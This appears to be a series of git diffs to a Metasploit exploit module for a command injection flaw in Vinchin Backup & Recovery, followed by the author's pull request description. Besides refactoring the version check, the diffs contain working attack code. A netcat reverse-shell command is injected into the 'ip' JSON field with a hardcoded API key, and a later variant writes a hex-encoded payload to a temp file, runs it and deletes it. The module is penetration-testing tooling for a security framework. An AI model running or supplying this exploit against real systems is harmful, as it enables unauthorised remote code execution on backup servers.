+    if (version >= Rex::Version.new('5.0.0') && version < Rex::Version.new('5.1.0')) ||
+       (version >= Rex::Version.new('6.0.0') && version < Rex::Version.new('6.1.0')) ||
+       (version >= Rex::Version.new('6.7.0') && version < Rex::Version.new('6.8.0')) ||
+       (version >= Rex::Version.new('7.0.0') && version < Rex::Version.new('7.0.2'))
+      return CheckCode::Vulnerable
     else
-      return CheckCode::Unknown('Unable to extract version.')
+      return CheckCode::Safe
     end
   end
 end

--- a/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
+++ b/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
@@ -34,13 +34,12 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://vinchin.com/'] # Vendor URL
         ],
         'DisclosureDate' => '2023-10-26',
-        'Notes'          =>
-        {
-          'Stability'   => [ CRASH_SAFE ],
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
           'SideEffects' => [ IOC_IN_LOGS ],
           'Reliability' => [ REPEATABLE_SESSION ],
-          'AKA'         => ['Vinchin Command Injection']
-        }
+          'AKA' => ['Vinchin Command Injection']
+        },
         'Platform' => ['linux'],
         'Targets' => [
           ['Automatic', {}]
@@ -106,13 +105,18 @@ class MetasploitModule < Msf::Exploit::Remote
         /^7\.0\.\d+(\.\d+)?$/
       ]
 
-      vulnerable = vulnerable_version_patterns.any? { |pattern| pattern.match?(version.to_s) }
+      version = Rex::Version.new(version)
+
+      vulnerable = vulnerable_version_patterns.any? do |pattern|
+        pattern.match(version.to_s)
+      end
 
       if vulnerable
         return CheckCode::Vulnerable("Detected vulnerable version: #{version}")
       else
         return CheckCode::Safe("Detected non-vulnerable version: #{version}")
       end
+
     else
       print_error('Unable to extract version with the regex provided.')
       return CheckCode::Unknown('Unable to extract version.')

--- a/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
+++ b/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
@@ -81,7 +81,6 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi('uri' => target_uri_path)
 
     unless res
-      print_error('Failed to connect to the target.')
       return CheckCode::Unknown('Failed to connect to the target.')
     end
 

--- a/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
+++ b/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
@@ -39,12 +39,13 @@ class MetasploitModule < Msf::Exploit::Remote
           'AKA' => ['Vinchin Command Injection']
         },
         'Platform' => ['linux', 'unix'],
+        'Arch' => [ARCH_CMD],
         'Targets' => [
           ['Automatic', {}]
         ],
+
         'DefaultTarget' => 0,
         'DefaultOptions' => {
-          'PAYLOAD' => 'generic/shell_reverse_tcp',
           'SSL' => true
         },
         'Privileged' => false
@@ -54,37 +55,38 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(443),
-        OptString.new('TARGETURI', [true, 'The base path to the Vinchin Backup & Recovery application', '/api/']),
-        OptString.new('APIKEY', [true, 'The hardcoded API key', '6e24cc40bfdb6963c04a4f1983c8af71'])
+        OptString.new('TARGETURI', [true, 'The base path to the Vinchin Backup & Recovery application', '/']),
+        OptString.new('APIKEY', [true, 'The hardcoded API key', '6e24cc40bfdb6963c04a4f1983c8af71']),
       ]
     )
+    datastore['FETCH_WRITABLE_DIR'] = '/usr/share/nginx/vinchin/tmp'
   end
 
   def exploit
-    injection_command = "nc #{datastore['LHOST']} #{datastore['LPORT']} -e /bin/bash"
-    data = "p={\"ip\":\"127.0.0.1 ;#{injection_command};\"}"
-    print_status('Sending payload...')
+    hex_encoded_payload = payload.encoded.unpack('H*').first
+    formatted_payload = hex_encoded_payload.scan(/../).map { |x| "\\\\x#{x}" }.join
+
+    temp_file = "#{datastore['FETCH_WRITABLE_DIR']}/#{Rex::Text.rand_text_alpha(8)}"
+    command = "echo -ne #{formatted_payload} | tee #{temp_file}; chmod 777 #{temp_file}; #{temp_file}; rm #{temp_file}"
+
     send_request_cgi({
       'method' => 'POST',
-      'uri' => normalize_uri(datastore['TARGETURI']),
+      'uri' => normalize_uri(datastore['TARGETURI'], '/api/'),
       'vars_get' => {
         'm' => '30',
         'f' => 'checkIpExists',
         'k' => datastore['APIKEY']
       },
-      'data' => data
+      'data' => "p={\"ip\":\"a||#{command}\"}"
     })
   end
 
   def check
-    target_uri_path = normalize_uri(target_uri.path.split('/')[0], '/login.php')
+    target_uri_path = normalize_uri(target_uri.path, '/login.php')
     res = send_request_cgi('uri' => target_uri_path)
 
-    unless res
-      return CheckCode::Unknown('Failed to connect to the target.')
-    end
+    return CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res.code == 200
 
-    print_status("HTTP Response Code: #{res.code}")
     version_pattern = /Vinchin build: (\d+\.\d+\.\d+\.\d+)/
     version_match = res.body.match(version_pattern)
 
@@ -92,15 +94,14 @@ class MetasploitModule < Msf::Exploit::Remote
       version = Rex::Version.new(version_match[1])
       print_status("Detected Vinchin version: #{version}")
 
-if (version >= Rex::Version.new('5.0.0') && version < Rex::Version.new('5.1.0')) ||
-   (version >= Rex::Version.new('6.0.0') && version < Rex::Version.new('6.1.0')) ||
-   (version >= Rex::Version.new('6.7.0') && version < Rex::Version.new('6.8.0')) ||
-   (version >= Rex::Version.new('7.0.0') && version < Rex::Version.new('7.0.2'))
-  return CheckCode::Vulnerable
-else
-  return CheckCode::Safe
-end
-
+      if (version >= Rex::Version.new('5.0.0') && version < Rex::Version.new('5.1.0')) ||
+         (version >= Rex::Version.new('6.0.0') && version < Rex::Version.new('6.1.0')) ||
+         (version >= Rex::Version.new('6.7.0') && version < Rex::Version.new('6.8.0')) ||
+         (version >= Rex::Version.new('7.0.0') && version < Rex::Version.new('7.0.2'))
+        return CheckCode::Vulnerable
+      else
+        return CheckCode::Safe
+      end
     else
       return CheckCode::Unknown('Unable to extract version.')
     end

--- a/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
+++ b/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
@@ -61,9 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    lhost = datastore['LHOST']
-    lport = datastore['LPORT']
-    injection_command = "nc #{lhost} #{lport} -e /bin/bash"
+    injection_command = "nc #{datastore['LHOST']} #{datastore['LPORT']} -e /bin/bash"
     data = "p={\"ip\":\"127.0.0.1 ;#{injection_command};\"}"
     print_status('Sending payload...')
     send_request_cgi({

--- a/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
+++ b/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
@@ -47,12 +47,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
         'DefaultTarget' => 0,
         'DefaultOptions' => {
-          'SSL' => true
+          'SSL' => true,
+          'FETCH_WRITABLE_DIR' => '/usr/share/nginx/vinchin/tmp'
         },
         'Privileged' => false
       )
     )
-
     register_options(
       [
         Opt::RPORT(443),
@@ -60,7 +60,6 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('APIKEY', [true, 'The hardcoded API key', '6e24cc40bfdb6963c04a4f1983c8af71']),
       ]
     )
-    datastore['FETCH_WRITABLE_DIR'] = '/usr/share/nginx/vinchin/tmp'
   end
 
   def exploit
@@ -69,7 +68,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     temp_file = "#{datastore['FETCH_WRITABLE_DIR']}/#{Rex::Text.rand_text_alpha(8)}"
     command = "echo -ne #{formatted_payload} | tee #{temp_file}; chmod 777 #{temp_file}; #{temp_file}; rm #{temp_file}"
-
     send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(datastore['TARGETURI'], '/api/'),
@@ -86,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote
     target_uri_path = normalize_uri(target_uri.path, '/login.php')
     res = send_request_cgi('uri' => target_uri_path)
 
-    return CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res.code == 200
+    return CheckCode::Unknown('Failed to connect to the target.') unless res
 
     version_pattern = /Vinchin build: (\d+\.\d+\.\d+\.\d+)/
     version_match = res.body.match(version_pattern)

--- a/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
+++ b/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
@@ -92,21 +92,14 @@ class MetasploitModule < Msf::Exploit::Remote
       version = Rex::Version.new(version_match[1])
       print_status("Detected Vinchin version: #{version}")
 
-      vulnerable_version_patterns = [
-        /^((5\.0|6\.0|6\.7)\.\d+(\.\d+)?|7\.0\.(0|1)(\.\d+)?)$/
-      ]
-
-      version = Rex::Version.new(version)
-
-      vulnerable = vulnerable_version_patterns.any? do |pattern|
-        pattern.match(version.to_s)
-      end
-
-      if vulnerable
-        return CheckCode::Vulnerable()
-      else
-        return CheckCode::Safe()
-      end
+if (version >= Rex::Version.new('5.0.0') && version < Rex::Version.new('5.1.0')) ||
+   (version >= Rex::Version.new('6.0.0') && version < Rex::Version.new('6.1.0')) ||
+   (version >= Rex::Version.new('6.7.0') && version < Rex::Version.new('6.8.0')) ||
+   (version >= Rex::Version.new('7.0.0') && version < Rex::Version.new('7.0.2'))
+  return CheckCode::Vulnerable
+else
+  return CheckCode::Safe
+end
 
     else
       print_error('Unable to extract version with the regex provided.')

--- a/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
+++ b/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
@@ -84,13 +84,13 @@ class MetasploitModule < Msf::Exploit::Remote
     target_uri_path = normalize_uri(target_uri.path, 'login.php')
     res = send_request_cgi('uri' => target_uri_path)
 
-    return CheckCode::Unknown.new('Failed to connect to the target.') unless res
+    return CheckCode::Unknown('Failed to connect to the target.') unless res
 
     version_pattern = /Vinchin build: (\d+\.\d+\.\d+\.\d+)/
     version_match = res.body.match(version_pattern)
 
     if !version_match || !version_match[1]
-      return CheckCode::Unknown.new('Unable to extract version.')
+      return CheckCode::Unknown('Unable to extract version.')
     end
 
     version = Rex::Version.new(version_match[1])


### PR DESCRIPTION
Hello Metasploit Team,

I am excited to submit a new exploit module for inclusion in the Metasploit Framework targeting a command injection vulnerability in Vinchin Backup & Recovery versions v5.0.*, v6.0.*, v6.7.*, and v7.0.*.

**Module Name**: exploit/linux/http/vinchin_backup_recovery_cmd_inject

### Module Description
This module exploits a command injection vulnerability in Vinchin Backup & Recovery software. It sends a specially crafted HTTP request to the server, resulting in arbitrary command execution under the context of the web server user. After extensive testing, I have determined that the `generic/shell_reverse_tcp` payload is uniquely suited to exploit this vulnerability effectively. Other payloads were tested but did not succeed, making this payload the only currently viable option for successful exploitation.

### Verification Steps:
1. Start `msfconsole`.
2. `use exploit/linux/http/vinchin_backup_recovery_cmd_inject`.
3. Set `RHOSTS`, `RPORT`, `SSL`, `TARGETURI`, `APIKEY`, `LHOST`, `LPORT`.
4. Run `check` to verify the target is vulnerable.
5. Run `exploit` to execute the payload on the target system.

### Scenarios
A comprehensive scenario is provided in the documentation, demonstrating the successful exploitation of a Vinchin Backup & Recovery system. This scenario also serves as a reference for the exploit's effectiveness when using the `generic/shell_reverse_tcp` payload. (Other payloads don't work in my lab)

I have closely followed the module development guidelines and included thorough documentation.

Please let me know if there are any required changes or additional tests that I could perform. I am open to feedback and willing to make any necessary revisions.

Thank you for considering my contribution to the Metasploit Framework.

Best regards,

Chocapikk